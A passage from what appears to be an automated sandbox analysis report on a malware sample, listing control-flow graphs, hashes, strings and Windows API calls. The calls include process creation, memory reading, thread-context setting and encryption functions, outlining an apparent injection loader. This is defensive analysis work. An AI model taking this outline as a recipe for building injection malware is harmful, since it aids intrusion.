3367->3368 3370 5a211f 3368->3370 3370->3311 3372 5a2adc IsWow64Process 3371->3372 3373 5a2ae9 3371->3373 3372->3373 3375 5a1980 9 API calls 3374->3375 3376 5a263a 3375->3376 3376->3348 3378 5a1000 GetPEB 3377->3378 3387 5a1a1f 3378->3387 3380 5a1a50 CreateFileW 3383 5a1a60 3380->3383 3380->3387 3381 5a1a7f VirtualAlloc 3382 5a1aa0 ReadFile 3381->3382 3381->3383 3382->3383 3386 5a1ac1 VirtualAlloc 3382->3386 3384 5a1c7e VirtualFree 3383->3384 3385 5a1c8f 3383->3385 3384->3385 3385->3348 3386->3383 3386->3387 3387->3381 3387->3383 3388 5a1b89 CloseHandle 3387->3388 3389 5a1b99 VirtualFree 3387->3389 3390 5a2860 GetPEB 3387->3390 3388->3387 3389->3387 3391 5a288a 3390->3391 3391->3380 3393 5a1980 9 API calls 3392->3393 3394 5a267a 3393->3394 3394->3359 3396 5a1980 9 API calls 3395->3396 3397 5a269a 3396->3397 3397->3370 3407 3f09b1 3414 3ee40d 3407->3414 3409 3f09c2 3417 3ef4c3 3409->3417 3411 3f09c7 3412 3f0a5f 3411->3412 3420 3ee18d 3411->3420 3424 3e2c0c GetPEB 3414->3424 3416 3ef4af 3416->3409 3418 3e2c0c GetPEB 3417->3418 3419 3f099d 3418->3419 3419->3411 3422 3ee19b 3420->3422 3421 3ee1e4 3421->3411 3422->3421 3426 3ee0ce 3422->3426 3425 3e2c21 3424->3425 3425->3416 3427 3ee0d9 3426->3427 3430 3ee0df 3426->3430 3427->3430 3431 3edfc1 3427->3431 3429 3ee106 3429->3422 3430->3422 3432 3edfce 3431->3432 3435 3e3743 GetPEB 3432->3435 3434 3ee000 3434->3429 3435->3434

                  Executed Functions

                  Memory Dump Source
                  • Source File: 00000009.00000002.323182929.005A1000.00000020.00000001.sdmp, Offset: 005A1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_5a1000_sortedwatched.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: f8b49f3466dcbdd5e63a53c087d3b72389dbc28b21cd111d0a4e51603c5f5366
                  • Instruction ID: 8b4e015e42c500266558983ad234722086081f856e728c507d880a578f1cc1b2
                  • Opcode Fuzzy Hash: f8b49f3466dcbdd5e63a53c087d3b72389dbc28b21cd111d0a4e51603c5f5366
                  • Instruction Fuzzy Hash: FD90023D71B47606024577E4055B98EAC443BD2740B448005E003014424E108438DE37
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 409 5a2670-5a267f call 5a1980 call 5a2600
                  Memory Dump Source
                  • Source File: 00000009.00000002.323182929.005A1000.00000020.00000001.sdmp, Offset: 005A1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_5a1000_sortedwatched.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: ab4c8c7f3a2b842a710522aa320b236c56b36bc81bbfa36c8a26bf4290abe6ea
                  • Instruction ID: 03a2004013140942733bdaa927d206a33c9ecafd5dee3ef4f3e5ee7f5b8ce5a6
                  • Opcode Fuzzy Hash: ab4c8c7f3a2b842a710522aa320b236c56b36bc81bbfa36c8a26bf4290abe6ea
                  • Instruction Fuzzy Hash: 8090027EA4582245124177E5052BD8E9D043BE3B40B449005A082014030C011614D237
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 404 5a2630-5a263f call 5a1980 call 5a2600
                  Memory Dump Source
                  • Source File: 00000009.00000002.323182929.005A1000.00000020.00000001.sdmp, Offset: 005A1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_5a1000_sortedwatched.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 77813ec1177f64da510f27dc46ca843b65ce5602e39920573ebb61a44d39366a
                  • Instruction ID: 1a29499123779eb327c6467ed996582b03211976afbaf0aefc381dc9cdc1ae28
                  • Opcode Fuzzy Hash: 77813ec1177f64da510f27dc46ca843b65ce5602e39920573ebb61a44d39366a
                  • Instruction Fuzzy Hash: A890023D1054064622017FF8042FB8E5C003BDA740F888501A14B419135D100410E537
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 419 5a26b0-5a26bf call 5a1980 call 5a2600
                  Memory Dump Source
                  • Source File: 00000009.00000002.323182929.005A1000.00000020.00000001.sdmp, Offset: 005A1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_5a1000_sortedwatched.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 14b9b3d89ed45de54cd9d34dc8431c11ec78ab6fb982c160575ebb8bab00b8b2
                  • Instruction ID: 26ae7e0a5234e1a818c55cd05fe20ae1a2ddb8f114118e7cacfb915d466a19a8
                  • Opcode Fuzzy Hash: 14b9b3d89ed45de54cd9d34dc8431c11ec78ab6fb982c160575ebb8bab00b8b2
                  • Instruction Fuzzy Hash: 7490023F60540646030077E4287BF8E5D447BE6790B458009E006519035D004410E137
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 580000-58000d 1 58000f-580013 0->1 2 580015-580017 0->2 1->2 3 58001c-580c58 call 580db0 1->3 4 580da6-580da9 2->4 12 580c5a-580c68 3->12 13 580c90-580cbd 3->13 14 580c6c-580c6e 12->14 17 580cbf-580cc1 13->17 18 580cc6-580cd0 13->18 14->13 16 580c70-580c87 14->16 16->13 23 580c89-580c8b 16->23 17->4 19 580ce1-580cea 18->19 21 580d08-580d1c 19->21 22 580cec-580d06 19->22 25 580d2d-580d34 21->25 22->19 23->4 26 580d43-580d72 25->26 27 580d36-580d41 25->27 29 580d76-580d78 26->29 27->25 30 580d7a-580d7c 29->30 31 580d7e-580d9b 29->31 30->4 33 580d9d-580d9f 31->33 34 580da1 31->34 33->4 34->4
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.323124687.00580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_580000_sortedwatched.jbxd
                  Similarity
                  • API ID:
                  • String ID: $ $ $ $!$!$#$$$'$+$-$.$.$1$2$2$3$5$5$5$5$6$6$8$:$<$<$=$>$>$?$A$A$A$B$B$CryptAcquireContextA$CryptEncrypt$CryptImportKey$D$E$H$H$I$J$K$K$L$L$M$N$R$R$R$R$S$S$V$W$W$[$[$[$\$\$`$`$a$advapi32.dll$c$d$e$e$e$e$e$e$g$g$g$h$h$i$i$k$k$n$n$o$p$p$q$q$r$s$s$s$t$t$t$u$u$u$u$u$v$x$x$x$}$}$}$~$~$~
                  • API String ID: 0-3394408708
                  • Opcode ID: 360789facf9acdbb35299756f2f936d2c052fbc7d21058e99c2ecf0cc8d9053c
                  • Instruction ID: be000f52bce4dcd1e50f743aed318fc3c9dcf0c12aa6391d2096f37728531638
                  • Opcode Fuzzy Hash: 360789facf9acdbb35299756f2f936d2c052fbc7d21058e99c2ecf0cc8d9053c
                  • Instruction Fuzzy Hash: 6692582090C7D9D9EB32C6788C587DDBEB11B27314F0841D9D5D83A2D2C7BA1B89CB66
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 35 5a1980-5a1a2e call 5a1000 38 5a1a35-5a1a5e call 5a2860 CreateFileW 35->38 41 5a1a60 38->41 42 5a1a65-5a1a78 38->42 43 5a1bb9-5a1bbd 41->43 49 5a1a7a 42->49 50 5a1a7f-5a1a99 VirtualAlloc 42->50 44 5a1bbf-5a1bc3 43->44 45 5a1c05-5a1c08 43->45 47 5a1bcf-5a1bd3 44->47 48 5a1bc5-5a1bc8 44->48 51 5a1c0b-5a1c12 45->51 52 5a1be6-5a1bea 47->52 53 5a1bd5-5a1bdf 47->53 48->47 49->43 54 5a1a9b 50->54 55 5a1aa0-5a1aba ReadFile 50->55 56 5a1c67-5a1c7c 51->56 57 5a1c14-5a1c1f 51->57 62 5a1bec-5a1bf6 52->62 63 5a1bfd 52->63 53->52 54->43 64 5a1abc 55->64 65 5a1ac1-5a1b01 VirtualAlloc 55->65 60 5a1c7e-5a1c89 VirtualFree 56->60 61 5a1c8f-5a1c97 56->61 58 5a1c23-5a1c2f 57->58 59 5a1c21 57->59 66 5a1c43-5a1c4f 58->66 67 5a1c31-5a1c41 58->67 59->56 60->61 62->63 63->45 64->43 68 5a1b08-5a1b23 call 5a2ab0 65->68 69 5a1b03 65->69 72 5a1c5c-5a1c62 66->72 73 5a1c51-5a1c5a 66->73 71 5a1c65 67->71 75 5a1b2e-5a1b38 68->75 69->43 71->51 72->71 73->71 76 5a1b3a-5a1b69 call 5a2ab0 75->76 77 5a1b6b-5a1b7f call 5a28c0 75->77 76->75 83 5a1b83-5a1b87 77->83 84 5a1b81 77->84 85 5a1b89-5a1b8d CloseHandle 83->85 86 5a1b93-5a1b97 83->86 84->43 85->86 87 5a1baa-5a1bb3 86->87 88 5a1b99-5a1ba4 VirtualFree 86->88 87->38 87->43 88->87
                  APIs
                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 005A1A51
                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 005A1C89
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.323182929.005A1000.00000020.00000001.sdmp, Offset: 005A1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_5a1000_sortedwatched.jbxd
                  Similarity
                  • API ID: CreateFileFreeVirtual
                  • String ID: |"Z
                  • API String ID: 204039940-2393290476
                  • Opcode ID: 61ae92364ca28658410062bed1a011159a615ec3b8f6d1c7bbb5100bd63cb779
                  • Instruction ID: e18daeba11334e8f2a33cb7d0495ad30b298fc31351f509367533032547c891c
                  • Opcode Fuzzy Hash: 61ae92364ca28658410062bed1a011159a615ec3b8f6d1c7bbb5100bd63cb779
                  • Instruction Fuzzy Hash: 27A11A74E00609EBDB14CFA4C995BEEBBB5BF49304F208599E505BB280D7759E40CBA8
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 89 5a1470-5a1504 call 5a2a90 * 3 96 5a151b 89->96 97 5a1506-5a1510 89->97 99 5a1522-5a153b 96->99 97->96 98 5a1512-5a1519 97->98 98->99 101 5a153d-5a1540 99->101 102 5a1545 99->102 103 5a18e7-5a18e9 101->103 104 5a154c-5a1576 CreateProcessW 102->104 106 5a1578 104->106 107 5a157d-5a1597 104->107 108 5a1899-5a189d 106->108 112 5a1599 107->112 113 5a159e-5a15b9 ReadProcessMemory 107->113 110 5a189f-5a18a3 108->110 111 5a18e5 108->111 114 5a18b5-5a18b9 110->114 115 5a18a5-5a18b1 110->115 111->103 112->108 118 5a15bb 113->118 119 5a15c0-5a15c9 113->119 116 5a18bb-5a18be 114->116 117 5a18c2-5a18c6 114->117 115->114 116->117 121 5a18c8-5a18cb 117->121 122 5a18cf-5a18d3 117->122 118->108 123 5a15cb-5a15da 119->123 124 5a15f2-5a160e call 5a2150 119->124 121->122 126 5a18e0-5a18e3 122->126 127 5a18d5-5a18db call 5a20a0 122->127 123->124 128 5a15dc-5a15e4 call 5a20a0 123->128 133 5a1610 124->133 134 5a1615-5a1638 call 5a2290 124->134 126->103 127->126 132 5a15e9-5a15eb 128->132 132->124 135 5a15ed 132->135 133->108 138 5a163a-5a163e 134->138 139 5a167f-5a16a0 call 5a2290 134->139 135->108 141 5a167a 138->141 142 5a1640-5a1671 call 5a2290 138->142 145 5a16a2 139->145 146 5a16a7-5a16c5 call 5a2ab0 139->146 141->108 149 5a1678 142->149 150 5a1673 142->150 145->108 152 5a16d0-5a16da 146->152 149->139 150->108 153 5a16dc-5a170e call 5a2ab0 152->153 154 5a1710-5a1714 152->154 153->152 156 5a171a-5a172a 154->156 157 5a17ff-5a181c call 5a1ca0 154->157 156->157 160 5a1730-5a1740 156->160 165 5a181e 157->165 166 5a1820-5a183f SetThreadContext 157->166 160->157 161 5a1746-5a176a 160->161 164 5a176d-5a1771 161->164 164->157 167 5a1777-5a178c 164->167 165->108 168 5a1843-5a184e call 5a1fd0 166->168 169 5a1841 166->169 171 5a17a0-5a17a4 167->171 175 5a1852-5a1856 168->175 176 5a1850 168->176 169->108 173 5a17e2-5a17fa 171->173 174 5a17a6-5a17b2 171->174 173->164 177 5a17e0 174->177 178 5a17b4-5a17de 174->178 179 5a1858-5a185c CloseHandle 175->179 180 
5a185f-5a1863 175->180 176->108 177->171 178->177 179->180 182 5a186c-5a1870 180->182 183 5a1865-5a1869 CloseHandle 180->183 184 5a1879-5a187d 182->184 185 5a1872-5a1876 CloseHandle 182->185 183->182 186 5a188a-5a1893 184->186 187 5a187f-5a1885 call 5a20a0 184->187 185->184 186->104 186->108 187->186
                  APIs
                  • CreateProcessW.KERNEL32(?,00000000), ref: 005A1571
                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 005A15B4
                  Memory Dump Source
                  • Source File: 00000009.00000002.323182929.005A1000.00000020.00000001.sdmp, Offset: 005A1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_5a1000_sortedwatched.jbxd
                  Similarity
                  • API ID: Process$CreateMemoryRead
                  • String ID:
                  • API String ID: 2726527582-0
                  • Opcode ID: 475f0689a72174ff0ae04c85c88f1a3403d427bfc216527feeb2969a55ebaa05
                  • Instruction ID: 14e23d45a34b2b31230b285c2d3060c628fe56dcac0e6220b2085c5311d597fc
                  • Opcode Fuzzy Hash: 475f0689a72174ff0ae04c85c88f1a3403d427bfc216527feeb2969a55ebaa05
                  • Instruction Fuzzy Hash: 6CF13A74E00609EFDB14CF98C885FEEBBB6BF89304F248559E615AB280D774E941CB54
                  Uniqueness

                  Uniqueness Score: 5.06%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 189 3e002d-3e009e call 3e0467 * 6 202 3e00a7-3e00b0 189->202 203 3e00a0-3e00a2 189->203 202->203 205 3e00b2-3e00b6 202->205 204 3e045f-3e0466 203->204 205->203 206 3e00b8-3e00c2 205->206 207 3e00e6-3e0107 GetNativeSystemInfo 206->207 208 3e00c4-3e00c7 206->208 207->203 209 3e0109-3e0133 VirtualAlloc 207->209 210 3e00c9-3e00cf 208->210 211 3e016c-3e0176 209->211 212 3e0135-3e013d 209->212 213 3e00d6 210->213 214 3e00d1-3e00d4 210->214 217 3e0178-3e017d 211->217 218 3e01b0-3e01c1 211->218 216 3e013f-3e0142 212->216 215 3e00d9-3e00e4 213->215 214->215 215->207 215->210 221 3e015d-3e015f 216->221 222 3e0144-3e014c 216->222 223 3e0181-3e0194 217->223 219 3e01c3-3e01dd 218->219 220 3e0240-3e024c 218->220 242 3e022e-3e023a 219->242 243 3e01df 219->243 224 3e02fc-3e0306 220->224 225 3e0252-3e0269 220->225 227 3e0161-3e0166 221->227 222->221 226 3e014e-3e0151 222->226 228 3e0196-3e019f 223->228 229 3e01a5-3e01aa 223->229 231 3e030c-3e0313 224->231 232 3e03c3-3e03d8 call 5a1900 224->232 225->224 234 3e026f-3e027f 225->234 236 3e0158-3e015b 226->236 237 3e0153-3e0156 226->237 227->216 238 3e0168 227->238 228->228 230 3e01a1 228->230 229->223 233 3e01ac 229->233 230->229 239 3e0315-3e031e 231->239 263 3e03da-3e03df 232->263 233->218 240 3e02e1-3e02f2 234->240 241 3e0281-3e0285 234->241 236->227 237->221 237->236 238->211 245 3e03b8-3e03bd 239->245 246 3e0324-3e033e 239->246 240->234 250 3e02f8 240->250 247 3e0286-3e0295 241->247 242->219 244 3e023c 242->244 249 3e01e3-3e01e7 243->249 244->220 245->232 245->239 251 3e0358-3e035a 246->251 252 3e0340-3e0342 246->252 253 3e029d-3e02a6 247->253 254 3e0297-3e029b 247->254 255 3e01e9 249->255 256 3e0207-3e0210 249->256 250->224 261 3e035c-3e035e 251->261 262 3e0373-3e0375 251->262 257 3e034b-3e034e 252->257 258 3e0344-3e0349 252->258 260 3e02cf-3e02d3 253->260 254->253 259 3e02a8-3e02ad 254->259 255->256 264 3e01eb-3e0205 255->264 272 3e0213-3e0228 256->272 265 3e0350-3e0356 257->265 258->265 266 
3e02af-3e02be 259->266 267 3e02c0-3e02c3 259->267 260->247 273 3e02d5-3e02dd 260->273 268 3e0364-3e0366 261->268 269 3e0360-3e0362 261->269 274 3e037c-3e0381 262->274 275 3e0377 262->275 270 3e045d 263->270 271 3e03e1-3e03e5 263->271 264->272 277 3e0384-3e03ae VirtualProtect 265->277 266->260 267->260 278 3e02c5-3e02cb 267->278 268->262 280 3e0368-3e036a 268->280 276 3e0379-3e037a 269->276 270->204 271->270 279 3e03e7-3e03f1 271->279 272->249 281 3e022a 272->281 273->240 274->277 275->276 276->277 277->203 282 3e03b4 277->282 278->260 279->270 283 3e03f3-3e03f7 279->283 280->277 284 3e036c-3e0371 280->284 281->242 282->245 283->270 285 3e03f9-3e040a 283->285 284->277 285->270 286 3e040c-3e0411 285->286 287 3e0413-3e0420 286->287 287->287 288 3e0422-3e0426 287->288 289 3e043e-3e0444 288->289 290 3e0428-3e043a 288->290 289->270 292 3e0446-3e045c 289->292 290->286 291 3e043c 290->291 291->270 292->270
                  APIs
                  • GetNativeSystemInfo.KERNEL32(?,?,?,?,003E0005), ref: 003E00EB
                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,003E0005), ref: 003E0113
                  Memory Dump Source
                  • Source File: 00000009.00000002.322934550.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_3e0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocInfoNativeSystemVirtual
                  • String ID:
                  • API String ID: 2032221330-0
                  • Opcode ID: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
                  • Instruction ID: cbfe8298b61e497efe309f90620b599b7266558e5100ec4ffa4d216141003c19
                  • Opcode Fuzzy Hash: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
                  • Instruction Fuzzy Hash: 8FE1E4756043A68FDB19CF5AC88472AB3E0FF84304F19462DE9859B6C1E7B4EC85CB91
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 295 5a1900-5a1978 call 5a18f0 call 5a1000 call 5a1470 ExitProcess
                  APIs
                  • ExitProcess.KERNELBASE(00000000), ref: 005A196E
                  Memory Dump Source
                  • Source File: 00000009.00000002.323182929.005A1000.00000020.00000001.sdmp, Offset: 005A1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_5a1000_sortedwatched.jbxd
                  Similarity
                  • API ID: ExitProcess
                  • String ID:
                  • API String ID: 621844428-0
                  Uniqueness

                  Uniqueness Score: 0.01%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 302 5a2ad0-5a2ada 303 5a2adc-5a2ae7 IsWow64Process 302->303 304 5a2afd 302->304 305 5a2ae9-5a2aef 303->305 306 5a2af1 303->306 307 5a2aff-5a2b01 304->307 308 5a2af8-5a2afb 305->308 306->308 308->307
                  APIs
                  • IsWow64Process.KERNELBASE(000000FF,?), ref: 005A2AE2
                  Memory Dump Source
                  • Source File: 00000009.00000002.323182929.005A1000.00000020.00000001.sdmp, Offset: 005A1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_5a1000_sortedwatched.jbxd
                  Similarity
                  • API ID: ProcessWow64
                  • String ID:
                  • API String ID: 2092917072-0
                  Uniqueness

                  Uniqueness Score: 0.16%

                  Non-executed Functions

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.322934550.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_3e0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: _memset
                  • String ID: P>
                  • API String ID: 2102423945-2683032675
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.322934550.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_3e0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: y`>
                  • API String ID: 0-16645313
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.322934550.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_3e0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: y`>
                  • API String ID: 0-16645313
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Memory Dump Source
                  • Source File: 00000009.00000002.323182929.005A1000.00000020.00000001.sdmp, Offset: 005A1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_5a1000_sortedwatched.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 00000009.00000002.322934550.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_3e0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 00000009.00000002.322934550.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_3e0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 00000009.00000002.323124687.00580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_580000_sortedwatched.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 00000009.00000002.323182929.005A1000.00000020.00000001.sdmp, Offset: 005A1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_5a1000_sortedwatched.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 00000009.00000002.323182929.005A1000.00000020.00000001.sdmp, Offset: 005A1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_5a1000_sortedwatched.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 00000009.00000002.322934550.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_3e0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 00000009.00000002.322934550.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_3e0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 00000009.00000002.322934550.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_3e0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 00000009.00000002.322934550.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_3e0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Execution Graph

                  Execution Coverage:12.4%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:10.2%
                  Total number of Nodes:186
                  Total number of Limit Nodes:3


                  Executed Functions

                  Memory Dump Source
                  • Source File: 0000000B.00000002.327417458.005B1000.00000020.00000001.sdmp, Offset: 005B1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_5b1000_sortedwatched.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 409 5b2670-5b267f call 5b1980 call 5b2600
                  Memory Dump Source
                  • Source File: 0000000B.00000002.327417458.005B1000.00000020.00000001.sdmp, Offset: 005B1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_5b1000_sortedwatched.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 404 5b2630-5b263f call 5b1980 call 5b2600
                  Memory Dump Source
                  • Source File: 0000000B.00000002.327417458.005B1000.00000020.00000001.sdmp, Offset: 005B1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_5b1000_sortedwatched.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 419 5b26b0-5b26bf call 5b1980 call 5b2600
                  Memory Dump Source
                  • Source File: 0000000B.00000002.327417458.005B1000.00000020.00000001.sdmp, Offset: 005B1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_5b1000_sortedwatched.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.327239879.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_3f0000_sortedwatched.jbxd
                  Similarity
                  • API ID:
                  • String ID: $ $ $ $!$!$#$$$'$+$-$.$.$1$2$2$3$5$5$5$5$6$6$8$:$<$<$=$>$>$?$A$A$A$B$B$CryptAcquireContextA$CryptEncrypt$CryptImportKey$D$E$H$H$I$J$K$K$L$L$M$N$R$R$R$R$S$S$V$W$W$[$[$[$\$\$`$`$a$advapi32.dll$c$d$e$e$e$e$e$e$g$g$g$h$h$i$i$k$k$n$n$o$p$p$q$q$r$s$s$s$t$t$t$u$u$u$u$u$v$x$x$x$}$}$}$~$~$~
                  • API String ID: 0-3394408708
                  Uniqueness

                  Uniqueness Score: 100.00%

                  APIs
                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 005B1A51
                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 005B1C89
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.327417458.005B1000.00000020.00000001.sdmp, Offset: 005B1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_5b1000_sortedwatched.jbxd
                  Similarity
                  • API ID: CreateFileFreeVirtual
                  • String ID: |"[
                  • API String ID: 204039940-4188112506
                  Uniqueness

                  Uniqueness Score: 100.00%

                  APIs
                  • CreateProcessW.KERNEL32(?,00000000), ref: 005B1571
                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 005B15B4
                  Memory Dump Source
                  • Source File: 0000000B.00000002.327417458.005B1000.00000020.00000001.sdmp, Offset: 005B1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_5b1000_sortedwatched.jbxd
                  Similarity
                  • API ID: Process$CreateMemoryRead
                  • String ID:
                  • API String ID: 2726527582-0
                  Uniqueness

                  Uniqueness Score: 5.06%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  APIs
                  • GetNativeSystemInfo.KERNEL32(?,?,?,?,004F0005), ref: 004F00EB
                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,004F0005), ref: 004F0113
                  Memory Dump Source
                  • Source File: 0000000B.00000002.327369163.004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
